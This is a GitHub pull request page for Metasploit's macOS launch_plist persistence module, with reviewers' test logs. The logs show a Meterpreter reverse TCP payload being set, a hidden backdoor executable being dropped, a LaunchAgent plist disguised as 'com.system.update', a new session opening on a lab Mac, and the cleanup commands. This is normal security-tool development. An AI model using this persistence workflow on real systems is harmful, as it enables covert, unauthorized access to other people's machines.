Skip to content

update plist persistence to mixin #20527

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 3 commits into from
Oct 3, 2025
Merged

update plist persistence to mixin #20527

merged 3 commits into from
Oct 3, 2025
+33 −21

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Sep 6, 2025

Updates persistence to the new persistence mixin, and changing the name to be more descriptive. Part of #20374

Verification

  • Start msfconsole
  • exploit the box somehow (ssh_login for instance)
  • use exploit/osx/persistence/launch_plist
  • set SESSION <id>
  • exploit
  • Verify persistence is created, and you get a new session if apt is run
  • Verify cleanup works
  • Document is updated and correct

msutovsky-r7
msutovsky-r7 reviewed Sep 11, 2025
View reviewed changes
@jheysel-r7 jheysel-r7 self-assigned this Sep 17, 2025
@jheysel-r7 jheysel-r7 added the rn-enhancement release notes enhancement label Sep 17, 2025
jheysel-r7
jheysel-r7 reviewed Sep 18, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die.

One small thing. Currently the list_removal_paths method still runs, prints out a clean up command and is just slightly more comprehensive then the RC script. Do we want to remove that method in favor of the RC script?

Old method list_removal_paths

[*] To remove the persistence, run:
rm -rf /Users/msfuser/Library/.wJBiOPrK ; rm /Users/msfuser/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

RC script:

(devbox) ➜  metasploit-framework git:(97e6f36009) ✗ cat /home/msfuser/.msf4/logs/persistence/harambes-Mac.local_20250918.0800/harambes-Mac.local_20250918.0800.rc
rm /Users/msfuser/Library/LaunchAgents/com.system.update.plist

Testing

Running module

msf exploit(osx/persistence/launch_plist) > set payload osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
msf exploit(osx/persistence/launch_plist) > run
[*] Exploit running as background job 14.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.130:8723
msf exploit(osx/persistence/launch_plist) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /Users/msfuser/Library is writable
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/msfuser/Library/.wJBiOPrK/com.system.update
[+] LaunchAgent added: /Users/msfuser/Library/LaunchAgents/com.system.update.plist
[!] To manually launch payload: launchctl load -w /Users/msfuser/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/msfuser/Library/.wJBiOPrK ; rm /Users/msfuser/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Meterpreter-compatible Cleaup RC file: /home/msfuser/.msf4/logs/persistence/harambes-Mac.local_20250918.0800/harambes-Mac.local_20250918.0800.rc
msf exploit(osx/persistence/launch_plist) >

Testing persistence

msf exploit(osx/persistence/launch_plist) > [*] Meterpreter session 7 opened (172.16.199.130:8723 -> 172.16.199.175:49154) at 2025-09-18 15:09:12 -0700

msf exploit(osx/persistence/launch_plist) > sessions -i -1
[*] Starting interaction with 7...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer     : harambes-Mac.local
OS           : macOS Monterey (macOS 12.6.1)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter >

Cleaning up

meterpreter > shell
Process 1715 created.
Channel 1 created.
rm -rf /Users/msfuser/Library/.wJBiOPrK ; rm /Users/msfuser/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] 172.16.199.175 - Meterpreter session 7 closed.  Reason: Died

@h00die
Copy link
Contributor Author

h00die commented Sep 19, 2025

Good looking out on that one!
Updated and working now:

meterpreter > run /root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc
[*] Processing /root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc for ERB directives.
resource (/root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc)> rm /Users/h00die/Library/.VBXmZxLr/com.system.update
resource (/root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc)> rm /Users/h00die/Library/LaunchAgents/com.system.update.plist
resource (/root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc)> execute -f /bin/launchctl -a "remove com.system.update"
Process 3184 created.
resource (/root/.msf4/logs/persistence/h00dies-MacBook-Pro.local_20250919.4428/h00dies-MacBook-Pro.local_20250919.4428.rc)> execute -f /bin/launchctl -a "stop com.system.update"
Process 3185 created.
meterpreter

@h00die h00die force-pushed the modern_persistence_plist branch from 97e6f36 to ae2f7d8 Compare September 19, 2025 17:46
jheysel-r7
jheysel-r7 reviewed Sep 23, 2025
View reviewed changes
@jheysel-r7
Copy link
Contributor

jheysel-r7 commented Oct 3, 2025
edited by dledda-r7
Loading

Release Notes

This moves the plist exploit module into the new persistence directory. It leverages the new functionality for persistence modules, by adding the persistence mixin.

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Oct 3, 2025
@jheysel-r7 jheysel-r7 merged commit 04188cb into rapid7:master Oct 3, 2025
17 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Oct 3, 2025
@h00die h00die deleted the modern_persistence_plist branch October 3, 2025 19:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels

enhancement rn-enhancement release notes enhancement

Projects

Metasploit Kanban
Archived in project

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@h00die @jheysel-r7 @msutovsky-r7